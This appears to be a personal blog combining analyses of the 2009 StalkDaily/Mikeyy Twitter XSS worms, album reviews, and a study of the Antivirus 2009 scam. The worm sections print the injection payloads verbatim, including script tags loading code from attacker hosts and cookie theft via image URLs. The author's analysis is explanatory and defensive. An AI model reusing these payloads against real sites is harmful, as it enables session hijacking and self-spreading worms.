Analysis

The code firstly defines 2 functions. 1) A complex function that returns a http connection object, allowing calls to a url (GET or POST) to be made. 2) A urlencode function to transform special characters in text to allow them to be sent as part of a url.

The code then performs the following actions when visiting an infected twitter page:

• Scan the pages HTML content, and extract the logged in users screen name.
• retrieve stored cookies for the twitter domain
• inserts into the document html an image element, the url of which is at uuuq.com and contains the above username and cookies. This effectively sends the username and cookies to the remove server, which most likely records them.
• inserts into the document html an image element, showing the logo at stalkdaily.com

Defined next is a function called wait. This function is then called via the setTimeout function. the setTimeout function sleeps for the specified time (allowing the browser to continue working), and then calls the requested function. The wait function does the following:

• Scans the html for the form_authenticity_token, a token placed there by twitter as an addition security mechanism designed to ensure the that action requests made to twitter originate from the browser, and logged in user.
• ramdomly chooses from one of the following message:
  • Dude, www.StalkDaily.com is awesome. What’s the fuss?
  • Join www.StalkDaily.com everyone!
  • Woooo, www.StalkDaily.com
  • Virus!? What? www.StalkDaily.com is legit!
  • Wow…www.StalkDaily.com
  • @twitter www.StalkDaily.com
• calls /status/update to tweet one of the above messages
• calls /account/settings to update the users profile web page to:
  • http://www.stalkdaily.com”></a><script src=”http://mikeyylolz.uuuq.com/x.js”></script><a

Conclusions

The worm

• tweets a message
• changes your profile web page to stalkdaily.com, but also injecting script code, thereby making this script a self-propogating worm.
• sends your username and cookies to a remote server.

The first two are similar to my analisis of the newer worm (although this uses the user-url field, rather than the profile-color field)

The third action is the dirsturbing one, though so far as I can tell, it was removed from the newer worm.

What this means, for those who viewed the profile of a user infected with the original worm:

• The remote site captures your username (no big deal)
• The remote site has your username and the session cookies you are connecting with

On a properly designed site, session cookies should only apply to a specific IP address. that is, if the remote hacker tries to re-use the username and cookies from a computer they control, twitter should reject the session, and require the user to login.

Twitter does not do this, which means acquiring the session cookie allows the remote hacker to impersonate your session. Presumabely twitter does not implement this security feature as a convenience, allowing twitter users to remain logged in while roaming to different internet connections.

Thankfully though, the session cookie is dropped from the server when you log out. Therefore logging out and back in will disallow the remote hacker from accessing your profile if:

• you log out of all sessions where you viewed an infected profile
• the remote hacker has not changed your password

As said in my previous article, users can and should protect themselves by only running javascript from sources they trust. The NoScript extension is an easy and relatively convenient way to do this.

Twitter 1) should review their code, ensuring all fields that accept information from the outside world properly escape all information sent, removing the possibility of XSS attacks, and 2) lock session cookies to a single IP address. The first I’m sure they have already done. The second I’m sure they will not, and probably will never *sigh*

The following is a quickly developed, haphazard analysis of the StalkDaily worm that infected accounts of twitter users on 12Apr 2009. Apologies for the roughness. It was done to satisfy my own curiosity. If you spot something clearly wrong, let me know. If anyone would like any further information, please contact me.

Observation

By observation, this worm does the following:

• Causes you to tweet something like:
  • Wow…Mikeyy.
  • Mikeyy. Woooo!
  • Dude, Mikeyy is the shit! :)
  • damn mikeyy. haha.
  • Man, Twitter can’t fix shit. Mikeyy owns. :)
  • Twitter should really fix this… Mikeyy
• Causes you to follow profile 28546293, or onedegrees
• Updates your profile name to “Mikey Owns”
• inserts a link to the worm code into your profiles color field
  

Unpacking

By comparing the accounts of infected and uninfected users we see the following code:

a { color: #</style>mikeyy:) “></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6f%6d%67%68%61%78%2e%75%75%75%71%2e%63%6f%6d%2f%77%6f%6f%2e%70%68%70%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <style> <a ; }

This appears in the place where we would expect to see a css color element as follows:

a { color: #0000ff; }

This appears to be an injection into the twitter database, replacing the colour code of the page with JavaScript code. The JavaScript code instructs the browser to load the JavaScript code located at http://omghax.uuuq.com/woo.php. By watching proxy logs of a machine browsing infected pages, we see the following pages being accessed:

http://omghax.uuuq.com/woo
 http://omghax.uuuq.com/bam

This is explained by examining one of these scripts. Within the script is found the following strings:

• Msxml2.XMLHTTP
• Microsoft.XMLHTTP
• connect
• oUpperCase
• GET
• ?
• open
• Method
• POST
• HTTP/1.1
• setRequestHeader
• Content-Type
• application/x-www-form-urlencoded
• onreadystatechange
• readyState
• send
• split
• join
• ‘
• %27
• (
• %28
• )
• %29
• *
• %2A
• ~
• %7E
• !
• %21
• %20
• +
• %
• replace
• innerHTML
• documentElement
• exec
• Dude, Mikeyy is the shit!
• Man, Twitter can’t fix shit. Mikeyy owns.
• Mikeyy. Woooo!
• Dude! Mikeyy! Seriously? Haha.
• Wow…Mikeyy.
• damn mikeyy. haha.
• random
• length
• floor
• </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/woo.php”></script>.source));</script> <style> <a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://content.ireel.com/jsxss.js”></script>.source));</script> <style><a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://content.ireel.com/xssjs.js”></script>.source));</script> <style><a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/bam”></script>.source));</script> <style><a
• </style>mikeyy:) “></a><script>document.write(<script src=”http://omghax.uuuq.com/woo”></script>.source));</script> <style><a
• /account/profile_settings
• POST
• authenticity_token=
• &user[profile_link_color]=
• &commit=save+changes
• /account/settings
• &user[name]=Mikeyy+Owns&user[url]=
• &tab=home&update=update
• /status/update
• &status=
• &return_rendered_status=true&twttr=true
• /friendships/create/28546293
• &twttr=true
• wait()

Analysis

Towards the bottom of this list you start to see some important elements:

• /account/profile_settings &user[profile_link_color]= &commit=save+changes
• /account/settings &user[name]=Mikeyy+Owns&user[url]=
• /status/update
• /friendships/create/28546293

While the code is obfuscated, and beyond my knowledge to easily decode, these strings provide some important clues. I would assume that the worm is calling URLs at twitter using these strings. Conceivably these would

• Update the profile colour, inserting the worm code
• Update the profile name
• creating a friendship with onedegrees

Because the code is run inside the browser, in the context of normal page views by the logged in twitter user, the code “acts on your behalf”, to perform these actions. Neither the script, or the script author know your username or password, it simply “asks” the browser to perform these actions. Because you are already logged on in the browser, the action is performed as if you did it yourself.

Conclusion

I would estimate that the root cause of this problem is an JavaScript injection vulnerability in twitters color field, which now seems to be fixed. This allowed the worm to place JavaScript code inside this field, rather than the expected colour code which would normally be sent by the browser.

While not the cause, another vulnerability that allowed this to happen is the web-browsers in-built JavaScript engine, which runs any JavaScript code it is instructed to. This to me is not desirable. In effect, every time you visit a website, you are inviting some unknown person to run whatever JavaScript code they like inside your browser. This is historically the cause of many major security and virus problems, and will be into the future.

JavaScript is a useful tool in creating interactive websites, but must considered carefully. I recommend disabling JavaScript by default and only enabling it for sites you trust. The NoScript extension makes this easy.

Being that the malicious code in the StalkDaily worm was hosted on an external site, running twitters javascript code would not have allowed this worm to execute unless you also permitted code from uuuh.com to run also.

Listening to the album was a little unpredictable, I had trouble with the first few tracks. After listening to this album for a month (a clear sign I have enjoyed the album, aside it sky-rocketing to the #1 artist in my last.fm profile) I have never found myself revisiting the early tracks. The first (Critical Acclaim) is far too angry for my tastes. After a bland organ intro, it drops into some unimaginative rhythms. A very provoking vocal style, almost yelling, feels like a violent street brawl, I just want to get out. The chorus is almost redeeming, until Matthew octaves up the final note, destroying the relief.

The second (Almost Easy) has a mix of elements, both good and bad.

• Some really interesting vocal styles.
• The chorus (mother) brings back some of my favourite elements from previous albums, the vocal harmonies, and contrast of vocal styles.
• Terribly boring driving snare.
• Unclear, and therefore untidy sounding fast rifs.

Scream begins with a Disturbed (band) inspired intro. And carefully builds with the aid of small details like piano fills. It tops it off with a carefully created chorus, with a very slightly pop rhythm feel that I find very present. The vocal harmonies were a slight acquired taste, but well worth it.

0:00-Critical Acclaim; 0:41-Almost Easy; 1:01-Scream

Afterlife is where this album begins to come into its own. A string intro that magically transitions into a traditional Avenged riff. A killer sounding bass brings in the verse. The bridges are fun, with heavy emphasis on the offbeat. The strings make a re-appearance in a short interlude, but continue after the guitar solo acting like a Latin horn section, emphasising the staccato rhythm. Non-existent outro, but then it would be hard otherwise to transition into the next track.

Gunslinger starts with a acoustic (steel string) intro, which they seem to find room for every album, and do a fine job, before rocketing into the track with an unforgiving power-chord riff. I love the subtle guitar soloing behind this track when it extends away from simple a arpeggio, that and the spirit-raising female backing vocals.

0:00-Afterlife; 0:40-Gunslinger

Tack 6 “Unbound (The Wild Ride)” is indeed the start of a wild ride, an amazing four tracks.
A song of tremendous contrast within itself, dueling guitar guitars followed by beautifully intricate piano runs, the quality of vocals, between clear and gruff, the double kick, which serves this song well, to the melody toms, small choir, and the childlike vocals that take out the track.

Brompton Cocktail is easy to like. It makes heavy use of my favourite 4-beat bar subdivision, the 3-3-2 pattern. The string highlights in the verse are lovely, but builds the song to a slightly empty chorus.

Lost was a bit difficult to judge, the shock of the vocal auto-tuner in the chorus took a while to get over, but after several listens I grew to like the way the effect was used. With previous albums the big selling point for me were the occasional multiple vocal harmonies, especially the slides from note to note. While some might argue the musicality of the individual voices, the combined effect was a win for me. While the auto-tuner removes the ability to create slides, it was carefully added to allow slides where required. The slight vocorder effect also for me provides an extra layer of expression, when selectively used. I think of it as an alternative to a gruff vocal style, just another tool in the kit.

0:00-Unbound; 0:53-Brompton Coctail; 1:23-Lost

A Little Piece of Heaven has been my addiction for weeks. First I want to list the instruments from the liner notes:

• Strings, Horns & Choir Arrangements – Steve Bartek
• Piano & Organ – Jamie Muhoberac
• Upright Bass – Miles Mosley
• Cello – Cameron Stone
• Violins – Caroline Campbell and Neil Hammond
• Viola – Andrew Duckles
• Choir – Beth Anderson, Monique Donnelly, Rob Giles, Debbie Hall, Scottie Haskell, Luana Jackson, Bob Joyce, Rock Logan, Susie Stevens Logan, Arnold McCuller, Gabriel Mann and Ed Zajack
• Alto Sax – Bill Liston and Brandon Fields
• Clarinet – Bill Liston and Rusty Higgins
• Tenor Sax – Dave Boruff and Rusty Higgins
• Baritone Sax – Joel Peskin
• Trumpet – Wayne Bergeron and Dan Foreno
• Trombone – Bruce Fowler and Alex IIes
• Additional Vocals – Juliette Commagere

This of course, in addition to the normal vocalist, guitars, bass and drums, and for me sets the stage for an exciting piece. The content of the song is quite graphic in parts, dealing with greed, lust, murder, necrophilia, reanimation/undead, and mass slaughter, but for those not offended may prove somewhat humours.
The musical content is absolutely thrilling, displaying a magically created wide ranging collection of sounds, tightly woven to help tell the story. For example, the piece starts with clarinets/piano builds with bari sax, tenor sax, and choir into a violent double kick driven rif, supported by sax and clarinets. Follows is a very rhythmic passage of percussion and clarinet, introducing guitars and horns, leading into some lovely rhythms and horn crescendos. A comic section consisting of a strong bari sax bass, a taunting clarinet and organ, and offbeat horns. Shortly after a strong guitar and choir section, with staccato strings magically transitions into a beautiful string passage lead by the bands vocal harmony. A strength an aspect that is a particular favourite of mine.
The song makes tremendous use of dynamics, something becoming a lost art, even among metal, where there are often only 2 settings, gentle crescendos and diminuendos can be so powerful in the right places.
The song certainly is a magical ride. I feel the the Bari sax provides subtle but crucial support to this song, and the uniquely wide range of instruments allows a powerful range of tones and expression, which was masterfully used.
YouTube has several several videos, many of which use the song in its entirety as a backing.

The album winds down with a pleasant country/blues track, a tradition for Avenged Sevenfold albums to include one on every album.

Dear God

This album I’m sure will still remain a favourite throughout the year, and I hope I find even just one or two albums that come close to matching this. If so it will make for a magical year of listening.

Check Wikipedia for more information on the band and their albums.

Cryptopsy – The Unspoken King

Never having heard this band before, I was enticed by a review on the cover; “…time signature blasphemy… bouts of unpredictable musical passages…”. These words are quite true, but unfortunately far more literally than I had expected. I’m not sure the use of “musical”is a complement, if only parts are musical, what fills the other 42 minutes of the album? OK, I have found it hard listening to this album, listening to it in the car while travelling, and while working did not reveal anything worth hearing, but now listening to it with a good pair of headphones I’m coming to grips with this album, but I’m still not impressed. It all started when in the opening seconds of the album I heard this:

Blast beat is something I can rarely tolerate. It overpowers any attempt to create melody or harmony, and fatigues the ears, making more than a few songs hard to tolerate. But alas, it remains for much of the album.

The first track holds no merit in my mind, the second has a solid groove in parts, but is totally unsupported, with no depth to make the song memorable. The short guitar solo is one of the few short passages where the listener is granted a reprieve from the wall of blast beat.

The rest of the album is much the same, walls of unmelodious sound, with occasional pauses from the drummer while a guitar plays a short melody. The album has some good rifs, some nice sounds, good material for contrast, but its assembled haphazardly, with no structure, building of ideas. I love bizarre time signature changes, but this album creates nothing from them. They’re there, but they do not convey anything to the listener.

If I had to recommend two tracks from this album, it would be 10, and perhaps 5. They have a fair variety, and at least some flow and structure.

This from track three is also one of the more enjoyable

On the whole I don’t see myself revisiting this album, Its been hard enough to get through to pull out the few bits I do like.

Nevetherym – Rendezvous

This was an interesting album. I had no idea what to expect. It was a 3 track album for $10. Its a self published album (the first) from the Central Coast. With only three tracks I figured there had to be something worthwhile there to warrant publishing a short CD. It must be “Interesting if not good” I said to myself, and the proprietor as I purchased the CD. The 26 minute album had me hooked immediately. Its amateurish, I cringe with every bad decision made in building the album, but there is so much promise that I find myself listening over and over.

Mix and recording wise, the album is a little awkward, over distorted and unclear in parts, but that is to be expected. The technical ability leaves some to be desired, phrasing, dynamics and timing aren’t perfect, but these can, and I’m sure will be worked on.

A violin features in all three songs, and baring the previous comment, sits very well. The vocals are the biggest disappointment. Conceptually they’re fine, but in execution, some vocal training is much needed to keep the voice on pitch.

The guitar rhythm in track one is very top 40 rock/old school Nickelback, which I like. It has a very different feel when layered with the violin. Great contrast between light and heavy sections, and great transitions. Slightly repetitive (a complaint I often have), but at least it helps to build the feel throughout the song by allowing you to become used to one feel before dragging you into another. Fantastic light section. Slight awkwardness in parts of the violin melody, but largely OK, great feel from the guitar, invoking an image of bells in my mind.
Slightly over-enthusiastic leading into the lifts, with the timing slightly off. Some poor melody choices in the violin back in the heavy section. Additionally the violin should NOT play the same riff as the guitars, it weakens the position of the violin to create emotion, and adds nothing to the feel. Some great chords thrown in towards the end to throw the listener off balance, before returning to the driving riff to finish.

Track 2 really shows the cracks in the vocals and the tone of the band, but still remains a solid effort. A shorter piece, less depth, but action packed. Again, terrific contrast, and very aggressive, and super moody. Bass guitar solo is muddy, and again, I’d like to see the violin do its own thing, or nothing at all.

Beautiful entry to track three, few tweaks to the mix would make this perfect, reverb on the pizzicato violin doesn’t sit right. Song is longer than it needs to be, with the main riff repeated. The violin again needs a bigger dose of originality. This song again does not have the depth of the first, but shows more variety, and certainly a lot of promise for their next album.

This album, with all its flaws, is a super original, promising album, I will certainly keep Nevetherym on my radar, and I wait in anticipation for their next release. To hear the full recordings of these songs, see Nevetherym on myspace.

This article describes an investigation into the cause of infection of AntiSpyware2009 and similar malware.

Goals:

• Find where this malware lives
• Find how this malware is installed

Method:

This research was performed on two VMWare Server 2 virtual machines, on an Internet connected computer, isolated by a firewall from any other computers on the site.

The two computers were:

• Windows 2000, Service Pack 4, Internet explorer 6 and Firefox 3, All windows updates installed
• Windows XP, Service Pack 3, no updates installed. Internet Explorer 6 and 7 tested.

Online research provided the researcher with several possible malicious websites. These sites were opened in the web browsers of the test machines.

Results:

The virus was discovered on several servers designed to handle redirects from other sites. These redirects come from sites that have been tampered with, usually by installing a .htaccess file that redirects users who visit an otherwise legitimate site.

Two different sites were found containing this virus. Each site presented several “warning” dialog boxes, telling the user they had a virus, and needed to run Antivirus 2009. Two examples of this dialogue are shown:

The site then presents a mock virus scan, which quickly pretends to find several (hundred) infections. Clicking on any part of the page at any time causes a file download dialog to show, allowing the user to download and install the malware on their system.

On completion of the falsified scan, the scam presents a warning that viruses have been found and should be removed. These warnings are simply images shown within the browser, allowing them to look very realistic.

Clicking on any part of the browser frame causes a file download window to appear. Curiously it always seems to have the letters “AVg”, possibly to make the user think its the common Grisoft AVG virus scanner. Running this file will install the Antivirus 2009 malware package on the computer.

This research did not proceed to install the malware and observe its behaviours, the goals were only to discover how infection occurred.

The files however were analysed, and were found to be viruses, both similar variants. Unfortunately only a few virus scanners actually detected this. The reason is unknown. Perhaps the virus is some form of self-modifying virus, which some scanners have difficulty detecting.

At the time of analysis (24th Jan), only three virus scanners were known to detect any virus in these files. Now a week later, 15-25 virus scanners (40-60%) now see it. Unfortunately, a newly downloaded file (recently updated by the virus writer) is only detected by 5 scanners. It seems the authors are constantly publishing new versions to hinder detection by virus scanners. (1 2 3)

Conclusion:

It was suspected before investigation that infection was due to a browser exploit, allowing the virus to install itself without user knowledge or consent. This was not found to be the case, rather, the user must knowingly install the virus, presumably after being convinced by the false virus report that it is a desirable course of action. Thus infection from these sites is preventable with user training.

Recommendations to users to avoid this style of attack are as follows.

So, this year I will endeavour to listen to at least one new album every fortnight. That is, as soon as I have some new music to listen.

Living in a small country town, its hard to find new music. Radio gets tedious, favourites are few and far between. For discovery I rely mainly on podcasts, such as NPRs All Songs Considdered, No Idle Frets, Coverville, and Brasscast.

With the nearest music shop (that sells anything outside top 20 pop) 50km away, music is hard to get hold of. Online stores have been little help over the years. Being a Linux user without an iPod, DRM-free mp3s are really the only option I will accept, and those options are still few. So for this year, I’m relying to having music mailed in.

I finally got an email informing me that JBHiFi are shipping part of the order I made at the start of this month, So I’ll be able to start in earnest soon. Just need to decide which album to start with:

• Krallice – Krallice (Still Waiting)
• Bon Iver – For Emma, forever Ago
• Death Cab For Cutie – Narrow Stairs
• Mgmt – Oracular Spectacular
• Sigur Ros – Med Sud I Eyrum Vid Spilum Endalaust
• Son Lux – At War With Walls & Mazes (Still Waiting)
• Fleet Foxes – Fleet Foxes
• Sparks – Exotic Creatures Of The Deep
• Saboteurs, the (The Raconteurs) – Consolers Of The Lonely
• Elbow – Seldom Seen Kid
• Jeff Hanson – Madam Owl (Still Waiting)
• James Galway – O’Reilly Street

I am keeping a spreadsheet of possible music to listen to, what I’ve ordered, and what i’ve listened to. Any suggestions of music to add, or what to listen to next will be much appreciated.

To keep the brain ticking over I will attempt to write a short review on each album as I listen to them, thought I’m not making any promises.

As for this month… On my first trip to Wagga for the year I dropped by my favourite music shop and picked three albums off the shelf. I have been listening to two of these, Cryptopsy – The Unspoken King, and Nevertherym – Rendezvous. I will review these soon.